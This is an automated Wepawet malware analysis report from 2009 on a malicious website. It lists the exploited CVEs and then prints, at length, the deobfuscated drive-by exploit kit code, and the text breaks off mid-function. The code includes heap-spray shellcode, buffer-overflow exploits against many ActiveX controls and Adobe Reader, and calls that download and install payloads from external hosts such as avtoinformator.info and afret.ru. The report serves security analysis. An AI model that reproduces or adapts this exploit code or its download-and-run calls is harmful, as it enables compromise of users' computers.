Wepawet » JavaScript Report for http://erotic-adventure.com

Analysis report for http://erotic-adventure.com

Sample Overview

URL	http://erotic-adventure.com
MD5	41a0ef86e5b3f342ac336bab0ae9c432
Analysis Started	2009-02-16 09:43:29
Report Generated	2009-05-17 00:33:12
Jsand version	1.03.02

See the report for domain erotic-adventure.com.

Detection results

Detector	Result
Jsand 1.03.02	malicious

Exploits

Name	Description	Reference
SuperBuddy LinkSBIcons	The LinkSBIcons method in the AOL's SuperBuddy ActiveX control (Sb.SuperBuddy.1) dereferences an arbitrary function pointer	CVE-2006-5820
Office Snapshot Viewer	The Microsoft Office Snapshot Viewer ActiveX control allows remote attackers to download arbitrary files to a client machine	CVE-2008-2463
WksPictureInterface	An ActiveX control in WkImgSrv.dll allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via an invalid WksPictureInterface property value	CVE-2008-1898
OurGame various errors	Errors in the GLIEDown2.dll ActiveX control via methods and properties IEStart, IEStartNative, ServerList, GameInfo, GroupName	SA30469
GomPlayer OpenURL	Buffer overflow in the GomManager via a long argument to the OpenUrl method	CVE-2007-5779
QuickTime RTSP	Stack-based buffer overflow in Apple QuickTime via an RTSP response with a long Content-Type header	CVE-2007-0015
NCTAudioFile2 SetFormatLikeSample	Stack-based buffer overflow in the NCTAudioFile2.AudioFile ActiveX control via a long argument to the SetFormatLikeSample function	CVE-2007-0018
Creative CacheFolder	Stack-based buffer overflow in the Creative Software AutoUpdate Engine ActiveX control via a long CacheFolder property value	CVE-2008-0955
Windows Media Encoder	Windows Media Encoder buffer overflow	CVE-2008-3008
Yahoo! Webcam Uploader	Yahoo! Webcam Uploader buffer overflow via long 'server' property followed by an invocation of the 'receive' method	CVE-2007-3147
Aurigma Photo Uploader	Aurigma Photo Uploader overflow in the ExtractIpct and ExtractExif properties	CVE-2008-0660
Yahoo! Webcam Viewer	Yahoo! Webcam Viewer buffer overflow via long server property followed by an invocation of the send method	CVE-2007-3148
Adobe Collab overflow	Multiple Adobe Reader and Acrobat buffer overflows	CVE-2007-5659
Adobe util.printf overflow	Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf	CVE-2008-2992

Deobfuscation results

Evals

zD3WrxiRGa = Math.ceil(QIALClnVG2evBZ / TY5USyxhht0Gk)

(repeated 1 time)

oqLV1hh = Math.min(QIALClnVG2evBZ, TY5USyxhht0Gk)

(repeated 17 times)

Nv0hEAr |= (DAYlq[EkcuuTEjvRYrDw.charCodeAt(bfgVV31 ++ ) - 48]) << DiIFwLmoIUFZ

(repeated 17158 times)

Q5SJ202u += TXbkdlJOc(118 ^ Nv0hEAr & 255)

(repeated 12868 times)

var url = "http://avtoinformator.info//shablon/07-12-14/system/load.php?id=5609";
var m = new Array();
var mf = 0;
function hex(num, width){
  var digits = "0123456789ABCDEF";
  var hex = digits.substr(num & 0xF, 1);
  while (num > 0xF){
    num = num >>> 4;
    hex = digits.substr(num & 0xF, 1) + hex;
  }
  var width = (width ? width : 0);
  while (hex.length < width)hex = "0" + hex;
  return hex;
}
function addr(addr){
  return unescape("%u" + hex(addr & 0xFFFF, 4) + "%u" + hex((addr >> 16) & 0xFFFF, 4));
}
function unes(str){
  var tmp = "";
  for (var i = 0; i < str.length; i += 4){
    tmp += addr((str.charCodeAt(i + 3) << 24) + (str.charCodeAt(i + 2) << 16) + (str.
    charCodeAt(i + 1) << 8) + str.charCodeAt(i));
  }
  return unescape(tmp);
}
function hav(){
  m = m;
  setTimeout("hav()", 1000);
}
function gss(ss, sss){
  while (ss.length * 2 < sss)ss += ss;
  ss = ss.substring(0, sss / 2);
  return ss;
}
function ms(){
  var plc = unescape("
%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F
%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703
%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D
%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF
%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA
%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087
%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF
%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34
%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85
%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC
%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64
%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B
%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC
%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F
%u7476%u696F%u666E%u726F%u616D%u6F74%u2E72%u6E69%u6F66%u2F2F%u6873%u6261%u6F6C%u2F6E%u3730
%u312D%u2D32%u3431%u732F%u7379%u6574%u2F6D%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3635%u3930"
  );
  CollectGarbage();
  if (mf)return (0);
  mf = 1;
  var hsta = 0x0c0c0c0c, hbs = 0x100000, pl = plc.length * 2, sss = hbs - (pl + 0x38);
  var ss = gss(addr(hsta), sss), hb = (hsta - hbs) / hbs;
  for (i = 0; i < hb; i ++ )m[i] = ss + plc;
  hav();
  return (1);
}
function cobj(obj){
  var ret = null;
  if (obj.substring(0, 1) == "{"){
    try {
      var clsid = obj.substring(1, obj.length - 1);
      ret = document.createElement("object");
      ret.setAttribute("classid", "clsid:" + clsid);
      return ret;
    }
    catch (e){
      return null;
    }
  }
  else {
    try {
      ret = new ActiveXObject(obj);
      return ret;
    }
    catch (e){
      return null;
    }
  }
}
function ya1(){
  try {
    var obj = null;
    obj = cobj("{DCE2F8B1-A520-11D4-8FD0-00D0B7730277}");
    if (obj){
      ms();
      var buf = addr(0x0c0c0c0c);
      while (buf.length < 5000)buf += buf;
      buf = buf.substring(0, 5000);
      obj.server = buf;
      obj.initialize();
      obj.send();
    }
  }
  catch (e){
  }
  return 0;
}
function ya2(){
  try {
    var obj = null;
    obj = cobj("{9D39223E-AE8E-11D4-8FD3-00D0B7730277}");
    if (obj){
      ms();
      var buf = addr(0x0c0c0c0c);
      while (buf.length < 5000)buf += buf;
      buf = buf.substring(0, 5000);
      obj.server = buf;
      obj.receive();
    }
  }
  catch (e){
  }
  return 0;
}
function fb(){
  try {
    var obj = null;
    obj = cobj("{5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}");
    if (obj){
      ms();
      var buf = addr(0x0c0c0c0c);
      while (buf.length < 400)buf += buf;
      buf = buf.substring(0, 400);
      obj.ExtractIptc = buf;
      obj.ExtractExif = buf;
    }
  }
  catch (e){
  }
  return 0;
}
function mdss(){
  try {
    var obj = null;
    obj = cobj("{EEE78591-FE22-11D0-8BEF-0060081841DE}");
    if (obj){
      ms();
      var buf = addr(0x0c0c0c0c);
      for (i = 1; i <= 9999; i ++ )buf += buf;
      EngineID = "default";
      MfgName = "default";
      ProductName = "default";
      ModeID = "default";
      ModeName = buf;
      LanguageID = 1;
      Dialect = "default";
      Speaker = "default";
      Style = 1;
      Gender = 1;
      Age = 1;
      Features = 1;
      Interfaces = 1;
      EngineFeatures = 1;
      RankEngineID = 1;
      RankMfgName = 1;
      RankProductName = 1;
      RankModeID = 1;
      RankModeName = 1;
      RankLanguage = 1;
      RankDialect = 1;
      RankSpeaker = 1;
      RankStyle = 1;
      RankGender = 1;
      RankAge = 1;
      RankFeatures = 1;
      RankInterfaces = 1;
      RankEngineFeatures = 1;
      obj.FindEngine(EngineID, MfgName, ProductName, ModeID, ModeName, LanguageID, Dialect
      , Speaker, Style, Gender, Age, Features, Interfaces, EngineFeatures, RankEngineID, 
      RankMfgName, RankProductName, RankModeID, RankModeName, RankLanguage, RankDialect, 
      RankSpeaker, RankStyle, RankGender, RankAge, RankFeatures, RankInterfaces, 
      RankEngineFeatures);
    }
  }
  catch (e){
  }
  return 0;
}
function office(){
  var sfrom = url + "&opr=1";
  var fuckavo = "SB";
  var x;
  var fuckavp = "SB";
  var obj;
  var fuckavx = "SB";
  var mycars = new Array();
  var fuckava = "SB";
  mycars[0] = "c:/Program Files/Outlook Express/WAB.EXE";
  mycars[1] = "d:/Program Files/Outlook Express/WAB.EXE";
  mycars[2] = "e:/Program Files/Outlook Express/WAB.EXE";
  var objlcx = cobj("snpvw.Snapshot Viewer Control.1");
  if (objlcx){
    setTimeout('window.location = "ldap://"', 3000);
    for (xin mycars){
      obj = cobj("snpvw.Snapshot Viewer Control.1")var buf1 = sfrom;
      var fuckavg = "SB";
      var buf2 = mycars[x];
      var fuckavj = "SB";
      obj.Zoom = 0;
      obj.ShowNavigationButtons = false;
      obj.AllowContextMenu = false;
      obj.SnapshotPath = buf1;
      try {
        obj.CompressedPath = buf2;
        obj.PrintSnapshot();
      }
      catch (e){
      }
    }
  }
  var fuckavqgga = "SB";
  var fuckavqggxa = "SBd";
  return 0;
}
function dl(){
  try {
    var obj = null;
    obj = cobj("Downloader.DLoader.1");
    if (obj){
      obj.DownloadAndInstall(url);
    }
  }
  catch (e){
  }
  return 0;
}
function wks(){
  try {
    var obj = null;
    obj = cobj("{00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6}");
    if (obj){
      ms();
      var num = 202116108;
      obj.WksPictureInterface = num;
    }
  }
  catch (e){
  }
  return 0;
}
function ogame(){
  try {
    var obj = null;
    obj = cobj("{F917534D-535B-416B-8E8F-0C04756C31A8}");
    if (obj){
      ms();
      var buf = "";
      while (buf.length < 600)buf += "\x0c\x0c\x0c\x0c";
      obj.IEStartNative(buf);
    }
  }
  catch (e){
  }
  return 0;
}
function ca(){
  try {
    var obj = null;
    obj = cobj("{BF6EFFF3-4558-4C4C-ADAF-A87891C5F3A3}");
    if (obj.AddColumn){
      ms();
      var buf = addr(0x0c0c0c0c);
      while (buf.length < 128)buf += buf;
      buf = buf.substring(0, 128);
      obj.AddColumn(buf, 1);
    }
  }
  catch (e){
  }
  return 0;
}
function buddy(){
  try {
    var obj = null;
    obj = cobj("Sb.SuperBuddy");
    if (obj){
      ms();
      obj.LinkSBIcons(0x0c0c0c0c);
    }
  }
  catch (e){
  }
  return 0;
}
function gomweb(){
  try {
    var obj = null;
    obj = cobj("GomWebCtrl.GomManager.1");
    if (obj){
      ms();
      var buf = "AAAA";
      while (buf.length < 506)buf += buf;
      buf = buf.substring(0, 506);
      buf += addr(0x0c0c0c0c);
      obj.OpenURL(buf);
    }
  }
  catch (e){
  }
  return 0;
}
function xmlcore(){
  try {
    var xml = null;
    var xml = cobj("Msxml2.XMLHTTP.6.0");
    if (xml){
      xml = cobj("Msxml2.XMLHTTP.4.0");
    }
    if (!xml)return 0;
    var obj = null;
    obj = cobj("{88d969c5-f192-11d4-a65f-0040963251e5}");
    obj = obj.objectif (obj){
      ms();
      try {
        obj.open(new Array(), new Array(), new Array(), new Array(), new Array());
      }
      catch (e){
      }
      ;
      obj.open(new Object(), new Object(), new Object(), new Object(), new Object());
      obj.setRequestHeader(new Object(), "...");
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
      obj.setRequestHeader(new Object(), 0x1016660);
    }
  }
  catch (e){
  }
  return 0;
}
function quick(){
  try {
    var obj = null;
    obj = cobj("QuickTime.QuickTime.4");
    if (obj){
      ms();
      var buf = "";
      for (var i = 0; i < 200; i ++ ){
        buf += "AAAA";
      }
      buf += "AAA";
      for (var i = 0; i < 3; i ++ )buf += "\x0c\x0c\x0c\x0c";
      var my_div = document.createElement("div");
      my_div.innerHTML = "
<object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" width=\"200\" height=\"200\
">" + "<param name=\"src\" value=\"object_rtsp\">" + 
      "<param name=\"type\" value=\"image/x-quicktime\">" + 
      "<param name=\"autoplay\" value=\"true\">" + 
      "<param name=\"qtnext1\" value=\"<rtsp://BBBB:" + buf + ">T<myself>\">" + 
      "<param name=\"target\" value=\"myself\">" + "</object>";
      document.body.appendChild(my_div);
    }
  }
  catch (e){
  }
  return 0;
}
function real(){
  try {
    var obj = null;
    obj = cobj("IERPCtl.IERPCtl.1");
    if (obj){
      if (obj.PlayerProperty("PRODUCTVERSION") > "6.0.14.552"){
        obj = cobj("{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}");
        ms();
        var m = "";
        var buf = addr(0x0c0c0c0c);
        while (buf.length < 32)buf += buf;
        buf = buf.substring(0, 32);
        m = obj.Console;
        obj.Console = buf;
        obj.Console = m;
        m = obj.Console;
        obj.Console = buf;
        obj.Console = m;
      }
    }
  }
  catch (e){
  }
  return 0;
}
function ntaudio(){
  try {
    var obj = null;
    obj = cobj("{77829F14-D911-40FF-A2F0-D11DB8D6D0BC}");
    if (obj){
      ms();
      var buf = addr(0x0c0c0c0c);
      while (buf.length < 5200)buf += buf;
      buf = buf.substring(0, 5200);
      obj.SetFormatLikeSample(buf);
    }
  }
  catch (e){
  }
  return 0;
}
function creative(){
  try {
    var obj = null;
    obj = cobj("{0A5FD7C5-A45C-49FC-ADB5-9952547D5715}");
    if (obj){
      ms();
      var buf = addr(0x0c0c0c0c);
      while (buf.length < 512)buf += buf;
      buf = buf.substring(0, 512);
      obj.cachefolder = buf;
    }
  }
  catch (e){
  }
  return 0;
}
function pdf(){
  try {
    var obj = null;
    obj = cobj("AcroPDF.PDF");
    if (!obj){
      obj = cobj("PDF.PdfCtrl");
    }
    if (obj){
      document.write("
<iframe src='http://avtoinformator.info//shablon/07-12-14/system/pdf.php?id=5609' width=1 
height=1 frameborder=0></iframe>");
      setTimeout('pdf2();', 10000);
    }
  }
  catch (e){
    document.write("
<iframe src='http://avtoinformator.info//shablon/07-12-14/system/pdf.php?id=5609' width=1 
height=1 frameborder=0></iframe>");
    setTimeout('pdf2();', 10000);
  }
  return 0;
}
function pdf2(){
  var obj = null;
  obj = cobj("AcroPDF.PDF");
  if (!obj){
    obj = cobj("PDF.PdfCtrl");
  }
  if (obj){
    wnd = window;
    while (wnd.parent != wnd){
      wnd = wnd.parent;
    }
    wnd.location = 
    "http://avtoinformator.info//shablon/07-12-14/system/pdf.php?id=5609&vis=1";
  }
  return 0;
}
function wme(){
  try {
    var obj = null;
    obj = cobj("{A8D3AD02-7508-4004-B2E9-AD33F087F43C}");
    if (obj){
      ms();
      var buf = addr(0x0c0c0c0c);
      while (buf.length < 2000)buf += buf;
      buf = buf.substring(0, 2000);
      obj.GetDetailsString(buf, 1);
    }
  }
  catch (e){
  }
  return 0;
}
if (office() || dl() || pdf() || wme() || ya1() || ya2() || fb() || mdss() || creative() || 
wks() || ogame() || ca() || buddy() || gomweb() || xmlcore() || quick() || real() || 
ntaudio()){
}

(repeated 1 time)

dLkiVFIpnaa = Math.ceil(b0VZJ / PlmS7XT)

(repeated 1 time)

r1XSnBulPdbO5 = Math.min(b0VZJ, PlmS7XT)

(repeated 4 times)

yXEiKoJur12N1 |= (HXNDGgJOe1ufY[vSxEiqzREHH.charCodeAt(bXOKiJ69xh ++ ) - 48]) << wXDNH

(repeated 3536 times)

xh8Vz += String["fromCharCode"](11 ^ yXEiKoJur12N1 & 255)

(repeated 2652 times)

var DWHWHMNXoKhurO = new Array();
function GkWCzedJeEMd(Camz7, BNPuvEEd97){
  while (Camz7.length * 2 < BNPuvEEd97){
    Camz7 += Camz7;
  }
  Camz7 = Camz7.substring(0, BNPuvEEd97
/2); return Camz7; } function kqmj4mN() { var C2vRe = 0x0c0c0c0c; var vFoTLs1jI = unescape
("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B
7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u07
03%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF
0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEF
EF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7
BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u10
87%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEB
AF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC
34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED
85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0E
EC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C
64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE7
9B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32
EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u61
2F%u7476%u696F%u666E%u726F%u616D%u6F74%u2E72%u6E69%u6F66%u2F2F%u732F%u6168%u6C62%u6E6F%u30
2F%u2D37%u3231%u312D%u2F34%u7973%u7473%u6D65%u2F2F%u6F6C%u6461%u702E%u7068%u693F%u3D64%u36
35%u3930%u7326%u6C70%u343D"); var Nypx1lOfnsucM = 0x400000; var yMynGdJPv = vFoTLs1jI.leng
th * 2; var BNPuvEEd97 = Nypx1lOfnsucM - (yMynGdJPv+0x38); var Camz7 = unescape("%u9090%u9
090"); Camz7 = GkWCzedJeEMd(Camz7, BNPuvEEd97); var XEqkKStCRj0 = (C2vRe - 0x400000)/
  Nypx1lOfnsucM;
  for (var HW0HfFJs66b = 0; HW0HfFJs66b < XEqkKStCRj0; HW0HfFJs66b ++ ){
    DWHWHMNXoKhurO[HW0HfFJs66b] = Camz7 + vFoTLs1jI;
  }
}
function VY8IR3vnI(){
  var sGDRuW = app.viewerVersion.toString();
  sGDRuW = sGDRuW.replace(/\D/g, "");
  var lVW5MGOo0aGtk = new Array(sGDRuW.charAt(0), sGDRuW.charAt(1), sGDRuW.charAt(2));
  if ((lVW5MGOo0aGtk[0] == 8 && ((lVW5MGOo0aGtk[1] == 1 && lVW5MGOo0aGtk[2] < 2) || 
  lVW5MGOo0aGtk[1] < 1)) || (lVW5MGOo0aGtk[0] == 7 && lVW5MGOo0aGtk[1] < 1) || (
  lVW5MGOo0aGtk[0] < 7)){
    kqmj4mN();
    var IIqgksbX = unescape("%u0c0c%u0c0c");
    while (IIqgksbX.length < 44952)IIqgksbX += IIqgksbX;
    this .collabStore = Collab.collectEmailInfo({
      subj : "", msg : IIqgksbX
    }
    );
  }
}
VY8IR3vnI();

(repeated 1 time)

LNEI2 = Math.ceil(BdRIKIezyrfXy / nQ5J6snGGYOg)

(repeated 1 time)

uBGY6 = Math.min(BdRIKIezyrfXy, nQ5J6snGGYOg)

(repeated 17 times)

daGOS6GNe |= (hXwEDbMS[Zl8PCfUV.charCodeAt(isNrge9E3pz71F ++ ) - 48]) << y9fSM

(repeated 16984 times)

PtspruZ += i2dPFr2cJ(56 ^ daGOS6GNe & 255)

(repeated 12738 times)

var url = "http://afret.ru//patterns/system/load.php?id=5590";
var m = new Array();
var mf = 0;
function hex(num, width){
  var digits = "0123456789ABCDEF";
  var hex = digits.substr(num & 0xF, 1);
  while (num > 0xF){
    num = num >>> 4;
    hex = digits.substr(num & 0xF, 1) + hex;
  }
  var width = (width ? width : 0);
  while (hex.length < width)hex = "0" + hex;
  return hex;
}
function addr(addr){
  return unescape("%u" + hex(addr & 0xFFFF, 4) + "%u" + hex((addr >> 16) & 0xFFFF, 4));
}
function unes(str){
  var tmp = "";
  for (var i = 0; i < str.length; i += 4){
    tmp += addr((str.charCodeAt(i + 3) << 24) + (str.charCodeAt(i + 2) << 16) + (str.
    charCodeAt(i + 1) << 8) + str.charCodeAt(i));
  }
  return unescape(tmp);
}
function hav(){
  m = m;
  setTimeout("hav()", 1000);
}
function gss(ss, sss){
  while (ss.length * 2 < sss)ss += ss;
  ss = ss.substring(0, sss / 2);
  return ss;
}
function ms(){
  var plc = unescape("
%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F
%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703
%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D
%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF
%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA
%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087
%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF
%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34
%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85
%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC
%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64
%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B
%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC
%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F
%u7266%u7465%u722E%u2F75%u702F%u7461%u6574%u6E72%u2F73%u7973%u7473%u6D65%u6C2F%u616F%u2E64
%u6870%u3F70%u6469%u353D%u3935%u0030");
  CollectGarbage();
  if (mf)return (0);
  mf = 1;
  var hsta = 0x0c0c0c0c, hbs = 0x100000, pl = plc.length * 2, sss = hbs - (pl + 0x38);
  var ss = gss(addr(hsta), sss), hb = (hsta - hbs) / hbs;
  for (i = 0; i < hb; i ++ )m[i] = ss + plc;
  hav();
  return (1);
}
function cobj(obj){
  var ret = null;
  if (obj.substring(0, 1) == "{"){
    try {
      var clsid = obj.substring(1, obj.length - 1);
      ret = document.createElement("object");
      ret.setAttribute("classid", "clsid:" + clsid);
      return ret;
    }
    catch (e){
      return null;
    }
  }
  else {
    try {
      ret = new ActiveXObject(obj);
      return ret;
    }
    catch (e){
      return null;
    }
  }
}
function ya1(){
  try {
    var obj = null;
    obj = cobj("{DCE2F8B1-A520-11D4-8FD0-00D0B7730277}");
    if (obj){
      ms();
      var buf = addr(0x0c0c0c0c);
      while (buf.length < 5000)buf += buf;
      buf = buf.substring(0, 5000);
      obj.server = buf;
      obj.initialize();
      obj.send();
    }
  }
  catch (e){
  }
  return 0;
}
function ya2(){
  try {
    var obj = null;
    obj = cobj("{9D39223E-AE8E-11D4-8FD3-00D0B7730277}");
    if (obj){
      ms();
      var buf = addr(0x0c0c0c0c);
      while (buf.length < 5000)buf += buf;
      buf = buf.substring(0, 5000);
      obj.server = buf;
      obj.receive();
    }
  }
  catch (e){
  }
  return 0;
}
function fb(){
  try {
    var obj = null;
    obj = cobj("{5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}");
    if (obj){
      ms();
      var buf = addr(0x0c0c0c0c);
      while (buf.length < 400)buf += buf;
      buf = buf.substring(0, 400);
      obj.ExtractIptc = buf;
      obj.ExtractExif = buf;
    }
  }
  catch (e){
  }
  return 0;
}
function mdss(){
  try {
    var obj = null;
    obj = cobj("{EEE78591-FE22-11D0-8BEF-0060081841DE}");
    if (obj){
      ms();
      var buf = addr(0x0c0c0c0c);
      for (i = 1; i <= 9999; i ++ )buf += buf;
      EngineID = "default";
      MfgName = "default";
      ProductName = "default";
      ModeID = "default";
      ModeName = buf;
      LanguageID = 1;
      Dialect = "default";
      Speaker = "default";
      Style = 1;
      Gender = 1;
      Age = 1;
      Features = 1;
      Interfaces = 1;
      EngineFeatures = 1;
      RankEngineID = 1;
      RankMfgName = 1;
      RankProductName = 1;
      RankModeID = 1;
      RankModeName = 1;
      RankLanguage = 1;
      RankDialect = 1;
      RankSpeaker = 1;
      RankStyle = 1;
      RankGender = 1;
      RankAge = 1;
      RankFeatures = 1;
      RankInterfaces = 1;
      RankEngineFeatures = 1;
      obj.FindEngine(EngineID, MfgName, ProductName, ModeID, ModeName, LanguageID, Dialect
      , Speaker, Style, Gender, Age, Features, Interfaces, EngineFeatures, RankEngineID, 
      RankMfgName, RankProductName, RankModeID, RankModeName, RankLanguage, RankDialect, 
      RankSpeaker, RankStyle, RankGender, RankAge, RankFeatures, RankInterfaces, 
      RankEngineFeatures);
    }
  }
  catch (e){
  }
  return 0;
}
function office(){
  var sfrom = url + "&opr=1";
  var fuckavo = "SB";
  var x;
  var fuckavp = "SB";
  var obj;
  var fuckavx = "SB";
  var mycars = new Array();
  var fuckava = "SB";
  mycars[0] = "c:/Program Files/Outlook Express/WAB.EXE";
  mycars[1] = "d:/Program Files/Outlook Express/WAB.EXE";
  mycars[2] = "e:/Program Files/Outlook Express/WAB.EXE";
  var objlcx = cobj("snpvw.Snapshot Viewer Control.1");
  if (objlcx){
    setTimeout('window.location = "ldap://"', 3000);
    for (xin mycars){
      obj = cobj("snpvw.Snapshot Viewer Control.1")var buf1 = sfrom;
      var fuckavg = "SB";
      var buf2 = mycars[x];
      var fuckavj = "SB";
      obj.Zoom = 0;
      obj.ShowNavigationButtons = false;
      obj.AllowContextMenu = false;
      obj.SnapshotPath = buf1;
      try {
        obj.CompressedPath = buf2;
        obj.PrintSnapshot();
      }
      catch (e){
      }
    }
  }
  var fuckavqgga = "SB";
  var fuckavqggxa = "SBd";
  return 0;
}
function dl(){
  try {
    var obj = null;
    obj = cobj("Downloader.DLoader.1");
    if (obj){
      obj.DownloadAndInstall(url);
    }
  }
  catch (e){
  }
  return 0;
}
function wks(){
  try {
    var obj = null;
    obj = cobj("{00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6}");
    if (obj){
      ms();
      var num = 202116108;
      obj.WksPictureInterface = num;
    }
  }
  catch (e){
  }
  return 0;
}
function ogame(){
  try {
    var obj = null;
    obj = cobj("{F917534D-535B-416B-8E8F-0C04756C31A8}");
    if (obj){
      ms();
      var buf = "";
